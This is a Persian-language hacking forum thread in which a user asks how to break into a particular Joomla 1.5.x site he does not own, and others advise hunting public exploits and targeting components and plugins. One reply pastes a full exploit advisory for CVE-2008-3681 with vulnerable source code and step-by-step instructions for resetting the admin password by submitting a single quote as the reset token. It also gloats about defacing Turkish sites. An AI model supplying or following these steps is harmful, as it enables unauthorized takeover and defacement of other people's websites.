چطور باید یک سایت جوملایی رو هک کرد؟؟؟

درود...!

بفرمائین:

آموزش تصویری هک جوملا از طریق کامپونت com_bookflip ([Only registered and activated users can see links])

باگ xss در جوملا ([Only registered and activated users can see links])



و .... !

تو انجمن سرچ کنید بازم هست.

موفق باشید...!

سلام من می خواهم یک سایت جوملایی را هک کنم.از چه راه های می توانم ان را هک کنم.
جوملای که روی اون سایت نصب است 1.5.22
است
با سپاس

دوست عزیز راه های پابلیک رو میتونید از اینجا گیر بیارید:
[Only registered and activated users can see links]
[Only registered and activated users can see links] ===>> توی desciription بنویسید joomla
و اما راه های پراویت که دیگه اسمش روشه و در دسترس همه نیست.
البته شما میتونید تلاش کنید و خودتون راه هایی برای نفوذ به این cms پیدا کنید.
موفق باشید

من زیاد هک بلد نیستم با جوملا ولی کاملا اشنایی دارم.
حالا باید با این چیزهای چی کار کنم.:58:

Topic :
Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Arrow SecurityAlert : 4157
Arrow CVE : CVE-2008-3681
Arrow CWE : CWE-264
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
ExploitAlert : 4485
Arrow Credit : d3m0n
Arrow Published : 17.08.2008

Arrow Affected Software : Joomla, Com_user, 1.5
Joomla, Com_user, 1.5.1
Joomla, Com_user, 1.5.2
Joomla, Com_user, 1.5.3
Joomla, Com_user, 1.5.4
Joomla, Com_user, 1.5.5



Arrow Advisory Content :

################################################## #########################
##########
#### Joomla 1.5.x Remote Admin Password Change
####
################################################## #########################
##########
#
#
# Author: d3m0n ([Only registered and activated users can see links])
#
# Greets: GregStar, gorion, d3d!k
#
#
#
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice
0-day pff #
#
#
################################################## #########################
##########



File : /components/com_user/controller.php

################################################## #########################
##########
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); <
--- {1}

// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED ',
$model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm'
, $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete'
);
}

################################################## #########################
##########

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation =
'.$db->Quote($token)); < ---- {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
################################################## #########################
##########



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT
id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url :
target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password
من از روش بالا استفاده کردم ولی نام کاربری ورمز عبور می خواهد.
باید اون جا را چی کار کنم

سلام عرض ادب لینک
باگ xss
خراب است

این آسیب پذیری ممکنه توی سایتی که میخواید هک کنید برطرف شده باشه.در ضمن خود جوملا cms کم قدرتی نیست و به همین راحتی ها نمیتونید هکش کنید.بهتره برید سراغ پلاگین های نصب شده و ببینید میتونید کاری بکنید یا نه.اگر طبق دستور العمل ها توی سایت هایی که گفتم پیش برید و نتونستید کاری بکنید احتمالا باگ پچ شده و دیگه امکان نفوذ از اون راه وجود نداره.این تاپیک رو هم بهتره که ادامه ندیم چون به اسپم میکشه.

چطور باید یک سایت جوملایی رو هک کرد؟؟؟
درود.
سلام دوستان
خیلی ممنون از دوستانی که راهنمایی کردند.
ببینید شما باید بگردی دنبال اکسپلویت هایی که تا به امروز پابلیک شده .
مثلا شاید الان این باگ که دوستمون لینک شو گذاشته باشند patch شده باشه.
شما برید تو سایت [Only registered and activated users can see links] در این سایت کل باگ ها یی که تا به امروز از جوملا pub شده رو می تونید ببینید و استفاه کنید.
موفق باشید

در سیستمی مثل جوملا اشنایی با عملکرد سیستم کافی نیست ، باید هسته سیستم رو هم بشناسید یا حداقل دید کلی نسبت به عملکرد هسته و mvc جوملا داشته باشید ضمن اینکه هسته جوملا با توجه به چندین سال توسعه توسط برنامه نویسهای خبره در سراسر دنیا به جرات امنه ، در مورد نفوذ معمولا سایتهای جوملای از سرور میخورن و کامپوننت ، بیشترین اسیب پذیری ها هم مربوط به کامپوننت هاست و ماژول ها ، بهتره بیشتر جستوجوهاتونو در این زمینه انجام بدید ، این باگی هم که شما گذاشتید (n2t3) مربوطه به نسخه های اولیه جوملا 1.5 و مدتهاست که بر طرف شده ، این باگ رو در حال حاظر در سایتهایی که بسیار قدیمی و اپدیت نشده اند شاید بتونید پیدا کنید

باگ مربوط به com_bookflip بسیار قدیمی و مدتهاست که پچ شده ، تو سایتهایی که دوست خوبم omid_server معرفی کرد به دنبال اکسپلویت های جدید باشید ، در ضمن قبل از برنامه ریزی برای حمله به سایت های جوملایی همیشه دید کلی نسبت به ساختار سایت و کامپوننت های استفاده شده در ان به دست اورید در غیر اینصورت با توجه به معماری جوملا کار بسیار سختی در پیش خواهید داشت ، ضمن اینکه نسخه 1.5.23 در هسته و کامپوننت های مربوط به هسته هیچ باگی ندارد یا حداقل تا الان چیز خاصی منتشر نشده

مرسی از لطف همه ای دوستان
اون نسخی که می خواهم هک کنم 1.5.21 یا 1.5.20 است لطفا اگر باگی در اون مورد هامی شناسید معرفی کنید

دست عزيز ،
لطفا توجه كنيد كه هر نسخه جومولا با نسخه ي قبليش در اين موضوع زياد فرقي نداره،شما بايد بدونيد كه با اين اطلاعات هميشه نميتوان يه سايت را هك كرد و ممكنه اصلا اون سايت علي رغم اينكه به نظر مياد قابل هك است داراي سيستم ضد هك قدرتمند باشه
+
واينكه دقت كنيد كه ممكنه بعضي باگ ها پچ شده باشه،پس هميشه بايد به دنبال اكسپلويت هاي جديد بود!
سايت هايي كه ودم شخصا استفاده ميكنم سايت هايي كه دوستان بالا معرفي كردند.
من با توجه به تضيحات دقيق دوستان و خرده توضيحات خودم نيازي به توضيحات اضافي نميبينم
اگهمورد خاصي بود پ-خ بديد!
موفق باشي-ياحق

سلام دوست من
چطوری میشه فقط فایل index.php قالب جوملا را بدست آورد
من آشنایی زیادی با قالب ها دارم ولی در نال کردن فایل اصلی عاجز هستم
یه راهنمایی هم در این مورد بنویسید
متشکرم

سلام دوست من
چطوری میشه فقط فایل index.php قالب جوملا را بدست آورد
من آشنایی زیادی با قالب ها دارم ولی در نال کردن فایل اصلی عاجز هستم
یه راهنمایی هم در این مورد بنویسید
متشکرم

دوست محترم اولا بحث ما مربوط به روش های هک جوملاست نه ریپ کردن قالب ، در مرحله دوم باید خدمتتون عرض کنم قالب جوملا مثل سایر سیستمها نیست در مورد قالب های ساده و سبک میتونید با ریپ کردن html قالب و باز سازی اون تا حدی به موفقیت برسید و در مورد قالبهای حرفه ای مبتنی بر فریمورک مثل قالب های یوتم و راکت تم و...... فکرشو هم نکنید چون به هیچ وجه بدون اکسس از سرور ممکن نیست و نهایتا بحث هایتان در سوال و جواب عمومی و تاپیک های مرتبط عنوان کنید

سلام
باگهای هسته جوملا 1.5.23 به قبل رو کی میتونه بذاره .
و در ضمن نحوه نفوذ بهشون .
ممنون میشم .